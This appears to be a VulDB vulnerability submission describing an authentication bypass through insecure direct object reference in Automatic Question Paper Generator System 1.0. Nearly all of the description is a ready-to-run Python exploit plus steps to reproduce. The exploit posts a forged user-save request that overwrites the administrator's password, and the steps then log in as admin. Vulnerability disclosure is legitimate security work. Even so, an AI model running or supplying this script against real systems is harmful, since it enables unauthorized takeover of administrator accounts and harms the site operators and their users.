| 标题 | Automatic Question Paper Generator System 1.0 - Authentication Bypass |
|---|
| 描述 | The Automatic Question Paper Generator (AQPG) in version 1.0 is vulnerable to bypassing authentication by changing the administrator password by insecure direct object reference (IDOR) attack, for this reason, the attacker can have full access to the administrator account by resetting your password.
* Steps to Reproduce:
1. Create a python file and paste this code and save:
#######################################################
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse
def banner():
print('''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/
[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')
def main():
fields = {
'id': "1",
'firstname': 'Adminstrator',
'lastname': 'Admin',
'username': 'admin',
'password': arguments.newpassword
}
boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=fields, boundary=boundary)
headers = {
"Connection": "keep-alive",
"Content-Type": m.content_type
}
r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)
if '1' in r.text:
print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')
else:
print('[-] Not vulnerable')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True)
parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True)
arguments = parser.parse_args()
banner()
sleep(2)
main()
#######################################################
2. Run the command:
python3 exploit.py -u http://target.com/aqpg/ -p newpassword
3. Now open your browser and go to the admin login page (http://target.com/aqpg/admin/login.php) and login using the admin:newpassword credentials.
You will be logged into the administrator account. |
|---|
| 来源 | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| 用户 | mrempy (UID 24379) |
|---|
| 提交 | 2022-03-05 18時13分 (4 年前) |
|---|
| 管理 | 2022-03-13 12時12分 (8 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 194839 [Automatic Question Paper Generator 1.0 权限提升] |
|---|
| 积分 | 20 |
|---|